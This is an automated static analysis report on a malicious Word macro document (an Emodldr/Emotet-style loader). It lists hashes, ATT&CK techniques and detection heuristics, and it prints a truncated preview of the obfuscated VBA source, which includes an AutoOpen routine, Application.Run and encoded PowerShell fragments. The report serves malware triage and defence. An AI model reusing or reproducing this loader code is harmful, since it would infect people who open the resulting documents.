Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bef2bb0dd1ecb01c…

MALICIOUS

Office (OLE)

Size: 156.0 KB
Created: 2018-04-13 14:51:00
Authoring application: Microsoft Office Word
First seen: 2019-05-16
MD5: 353cf863b60cc894d22590d2bf7452b4
SHA-1: 2d1766a5bf717e8a3dc7227ad243fdb9fdc328b9
SHA-256: bef2bb0dd1ecb01c2b19b487c2beeb85fa8ec6166ff7c3b7fe17afb9a3b4f849
Risk Score: 204

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1041 Exfiltration Over C2 Channel

The sample is a malicious Office document containing a VBA macro. The macro utilizes a Shell() call, indicating an attempt to execute arbitrary code. The presence of legacy WordBasic auto-exec markers and the ClamAV detection further confirm its malicious nature. The VBA script appears to be obfuscated but likely downloads and executes a second-stage payload.

Heuristics (7)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of an old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 151199 bytes
SHA-256: 7846e6bb191d7e27945bcc9315a209ad1c096193154f10c5d05c42efbece04dc
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 60 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "wNswGIA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case zItsLo
Case 26173
kcIrs = CStr(24551 * Log(UjrMH) * 87768 - vsYcs)
oGrTnA = 6843
End Select
Application.Run TzlRvk + "jpWcZGz" + kJjqHh, oSGnAo + pwnTqYKXS + BUiwW
Select Case dkpErJ
Case 20562
jGuMJ = CStr(36706 * Log(jolkJ) * 25348 - ZMzzO)
SfDUYI = 27030
End Select
End Sub

Attribute VB_Name = "TfzzWaI"
Sub LbrVC(fwLNO)
Select Case LcEsu
Case 66219
BDZoBF = CStr(19956 * Log(Jmnnm) * 18659 - AYItZ)
zGJLt = 4585
End Select
End Sub
Function pwnTqYKXS()
On Error Resume Next
Select Case UEcXla
Case 57088
IoUDql = CStr(74606 * Log(Nibilk) * 42180 - EijJqw)
ULOWI = 29927
End Select
HOmsfoq = ltdHa("3zDkAMQBiAGYANwBiADYAMgA3ADQAZQBkADgANwAwADQAYQA1AGQAYgBiAGEANwBkAGIAYQA2ADIAZQA3ADAAMgAzADQAYgAxADcAYQBjADUAMQAxADUAYgBiADUAOQBkADIAMgBlAGQAOAA0ADIAOQAxADUAMgBjm4RN,", 3 + uzqUi - uzqUi, 159 + uzqUi - uzqUi)
Select Case foWbYJ
Case 35126
HCtid = CStr(53402 * Log(RvkisT) * 5908 - UoJSzs)
PdijDm = 15771
End Select
Select Case wzDObB
Case 57836
hWDXQA = CStr(16896 * Log(cPzRp) * 53382 - JQXAn)
ZhpVtZ = 1485
End Select
UELfRKWj = ltdHa("jhaL]::SEcuresTRingtOGlobalallOcUnicoDe($('76492d1116743f042341l%wn8", 2 + LMQia - LMQia, 62 + LMQia - LMQia)
Select Case SmCQzS
Case 18329
iITBPt = CStr(88815 * Log(VpVnt) * 96032 - BqCHp)
CWaIh = 19749
End Select
Select Case TWwntV
Case 33928
HNDtOL = CStr(60999 * Log(MfiWU) * 24561 - TllAQE)
PPrWIS = 89606
End Select
fqRuYJPGk = ltdHa("zgA4AGYAYwA2AGEAYwBlADYAMQBmAGUAOQBiADYAMwBlAGMAYgBmAGMANgA3A4OOin", 2 + zBpJBP - zBpJBP, 60 + zBpJBP - zBpJBP)
Select Case DBwowf
Case 45429
piALu = CStr(7237 * Log(WKHsfC) * 15035 - AnVwo)
sCNPV = 52848
End Select
Select Case Pizvsw
Case 21809
AHiWY = CStr(25454 * Log(GzOCu) * 18092 - sJUYv)
SXoVq = 53339
End Select
fQYSVFdjsYC = ltdHa("kTn5AGQAYgBmAGEAOQA0AGEANABiADUAMAA3AGQAZQBmAGUAZAA1ADAAMQA0AGYANQBiADQAMgA5AGIAOAAwADgAZQAwADQAZgA0AGQAYwAyAGQANwAwAGIAMwBhASKzj", 4 + afOzvV - afOzvV, 122 + afOzvV - afOzvV)
Select Case HdBYmG
Case 10763
BzIjWL = CStr(9940 * Log(irbWP) * 73551 - aTApAd)
JjwiJ = 55843
End Select
Select Case MaKnR
Case 77176
LKviO = CStr(73718 * Log(IzRUdp) * 27875 - cuVCOB)
qFlNjI = 20686
End Select
COuac = ltdHa("5MgBhAGMANQBkAGYAMAA0ADUAOQA2ADIANgBjAGEAMQA4ADUAMgAyADYAZQAzADgANwA4AGYAMAAzADMAOQA4AGYAYQAwADMAZQAzAGMAYgBmADQAOABkADYANgBiADIAMwBlADcAMgBmADcAYgAzAGEAMAA5ADIAMQA4ADEA5zbT2HlN", 2 + pQnDUq - pQnDUq, 168 + pQnDUq - pQnDUq)
Select Case jjclH
Case 47151
wtwIE = CStr(7438 * Log(Rvkrh) * 94875 - ROZUh)
pzBCj = 94877
End Select
Select Case HksRRP
Case 89834
lQWwJ = CStr(16840 * Log(sCYUbG) * 4040 - hHfrLb)
HzvoN = 24402
End Select
INkpbb = ltdHa("AN%2AGCj", 5 + inAEHG - inAEHG, 2 + inAEHG - inAEHG)
Select Case QlqwNX
Case 35151
EwBwD = CStr(9469 * Log(SFVFAL) * 19725 - YjuiIZ)
Uukwm = 74765
End Select
Select Case bUqrlC
Case 55516
DkZcI = CStr(98972 * Log(WFEnDv) * 23993 - tbiqb)
clbVF = 55889
End Select
fjcTsGV = ltdHa("27GCAMQAyAGUAYQBhAGQAMgBiADgAMwBjADAAMABhAGEAZAA0AGYAYwAwAGMANABkADgAZQAyAGUAYgA1AGYANgBiADgAZQAzADEAZABiADQAZQA5AGYAOQA2AGMAYwAwWX", 5 + dsiSOC - dsiSOC, 125 + dsiSOC - dsiSOC)
Select Case IatmN
Case 688
zEKqwk = CStr(44244 * Log(AsvwOP) * 93634 - DLBub)
zGCWlO = 60094
End Select
Select Case CHTis
Case 45280
SMGrVR = CStr(54218 * Log(XzZjH) * 95928 - KRSWK)
hwzHpQ = 51272
End Select
JwTmAREwIp = ltdHa("kFwF3ADgAOAAzADUAYwAwADYAMAA3ADYANwAzAGMAMwA1ADMAMwBkAGYAOQA4AGUANgA2AGEAMQA2ADAAYQBkAGYAZAAzAGMAMgAyAGMAZgBhADYAYwBlADUAYgAxADQAYwAzAGUAMgAxADgAYgA3ADkANgA3AGEAMAA4ADUAZABlAGMAMwEV", 5 + ApuaH - ApuaH, 175 + ApuaH - ApuaH)
Select Case wapqLB
Case 60068
jaZtqC = CStr(82680 * Log(dXLkwC) * 30644 - MBkQJ)
fBBfbY = 68827
End Select
Select Case jPtFfV
Case 80341
ZNdaBV = CStr(18084 * Log(ZSLVGT) *
... (truncated)